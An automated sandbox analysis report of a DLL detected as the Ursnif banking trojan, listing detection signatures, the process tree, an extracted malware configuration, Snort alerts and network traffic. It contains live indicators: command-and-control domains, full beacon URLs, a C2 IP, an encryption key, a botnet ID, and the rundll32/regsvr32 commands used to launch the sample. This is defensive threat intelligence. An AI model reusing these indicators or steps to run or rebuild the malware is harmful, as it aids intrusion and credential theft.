Play interactive tour

Edit tour

Windows Analysis Report a04.dll

Overview

General Information

Sample Name:	a04.dll
Analysis ID:	498854
MD5:	a04cc72f0946720cc875ed228f565c1d
SHA1:	58b12ddffb7015e8857209c60a06ed4419a23641
SHA256:	e04823c56b627e74c92656340de38aed9804af65040bbed746b206de5a122dc5
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Writes or reads registry keys via WMI

Machine Learning detection for sample

Writes registry values via WMI

Uses 32bit PE files

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Queries the installation date of Windows

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Contains functionality to read the PEB

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5692 cmdline: loaddll32.exe 'C:\Users\user\Desktop\a04.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 5052 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 3436 cmdline: rundll32.exe 'C:\Users\user\Desktop\a04.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 1576 cmdline: regsvr32.exe /s C:\Users\user\Desktop\a04.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

iexplore.exe (PID: 2792 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5300 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4184 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82960 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4044 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17424 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5264 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3604 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82984 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 3160 cmdline: rundll32.exe C:\Users\user\Desktop\a04.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "J1v92dmlHEXvTq5f5j3hHqD70axrY5eELvziRmk2ZRpplesdH60SWuvAeSoVjaz9ziV8nMt5HZ9yXir8qEhrqq8hQHTJhjrVOT9MbyGYWfZYzeSsY3rIzsZwtP29YyBAT1PpSvyXXlCPmJQXR5Q//8WQgOVDWmVCE+/SpgqvzveosdxnJtgxBktD7wgQNaGVGyH4OJZNZ9g7ljttRKxaL0JCbq13a39yNbpeHzFOy2LZ195Kd7DQep1KcpDmTFkXlvhDjwtk01EiI8xQCLM1y7h+pPXaP6XItJoqiCYUm0VCZWC2PaDptTz+jxtvWnkZONCsmfIGHURcctQ1Ek8LULijbdhGJZWpF2GtQXrTyK4=", "c2_domain": ["app10.laptok.at", "apt.feel500.at", "init.in100k.at"], "botnet": "1500", "server": "580", "serpent_key": "dHCsos5nQ1EGXxPs", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.908592285.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.986796014.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.919043739.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.986936455.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.986844701.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.908402373.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.986951614.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.908284836.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.1181352410.00000000010F9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.862882724.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1182185098.00000000030A9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000003.919333557.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.1183574804.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.862687156.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.919382135.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.863055809.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.862929900.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000002.1183218956.00000000050D9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.986702942.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.908521770.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.862999025.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.810323284.0000000000FF0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000003.986736746.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.918914357.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.908362779.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.986915722.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.862717977.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.806401680.00000000006B0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000002.1182966669.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.986870790.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.918874706.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.804569099.00000000032C0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000002.1182699282.0000000004CB9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.863040607.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.1182360393.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.908553310.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.862644494.00000000038F8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.919207187.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.918946609.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.908608901.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000003.919351635.0000000004FF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000003.00000003.908487582.0000000005AF8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.1182795536.0000000005568000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 5692	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: regsvr32.exe PID: 1576	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 3436	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 3160	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.32e0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.6b0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.6e050000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.fc0000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.6e050000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.a70000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.6e050000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.50d94a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.10f94a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.regsvr32.exe.bb8d06.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.6e050000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.3.rundll32.exe.6b8d06.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.4cb94a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.30a94a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.4cb94a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.30a94a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.ff8d06.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.2.rundll32.exe.50d94a0.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.10f94a0.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.32c8d06.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000002.00000003.800171088.0000000000BB0000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "J1v92dmlHEXvTq5f5j3hHqD70axrY5eELvziRmk2ZRpplesdH60SWuvAeSoVjaz9ziV8nMt5HZ9yXir8qEhrqq8hQHTJhjrVOT9MbyGYWfZYzeSsY3rIzsZwtP29YyBAT1PpSvyXXlCPmJQXR5Q//8WQgOVDWmVCE+/SpgqvzveosdxnJtgxBktD7wgQNaGVGyH4OJZNZ9g7ljttRKxaL0JCbq13a39yNbpeHzFOy2LZ195Kd7DQep1KcpDmTFkXlvhDjwtk01EiI8xQCLM1y7h+pPXaP6XItJoqiCYUm0VCZWC2PaDptTz+jxtvWnkZONCsmfIGHURcctQ1Ek8LULijbdhGJZWpF2GtQXrTyK4=", "c2_domain": ["app10.laptok.at", "apt.feel500.at", "init.in100k.at"], "botnet": "1500", "server": "580", "serpent_key": "dHCsos5nQ1EGXxPs", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: a04.dll	Virustotal: Detection: 59%	Perma Link
Source: a04.dll	Metadefender: Detection: 17%	Perma Link
Source: a04.dll	ReversingLabs: Detection: 71%

Antivirus detection for URL or domain

Show sources

Source: http://app10.laptok.at/KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX	Avira URL Cloud: Label: malware
Source: http://app10.laptok.at/favicon.ico	Avira URL Cloud: Label: malware
Source: http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6	Avira URL Cloud: Label: malware
Source: http://app10.laptok.at/iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbI	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: app10.laptok.at

Virustotal: Detection: 12%

Perma Link

Machine Learning detection for sample

Show sources

Source: a04.dll

Joe Sandbox ML: detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		0_2_00FC35A1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A735A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,		2_2_00A735A1

Source: a04.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.98:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.98:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.81.187:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.81.187:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.174.68:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.174.68:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.111.131:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.111.131:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.195.217.206:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.195.217.206:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.197.99.6:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.197.99.6:443 -> 192.168.2.4:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.0.31:443 -> 192.168.2.4:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.156.0.31:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49852 version: TLS 1.2

Source: a04.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\Month\quick-major\729\Key\key.pdb source: rundll32.exe, a04.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00FC4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		0_2_00FC4E9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_00A74E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		2_2_00A74E9C

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49936 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49936 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49961 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49961 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49965 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49997 -> 87.106.18.141:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49997 -> 87.106.18.141:80

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: Joe Sandbox View

IP Address: 172.67.69.19 172.67.69.19

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: de-ch[1].htm.6.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x897ba4cc,0x01d7bb82</date><accdate>0x897ba4cc,0x01d7bb82</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.6.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, 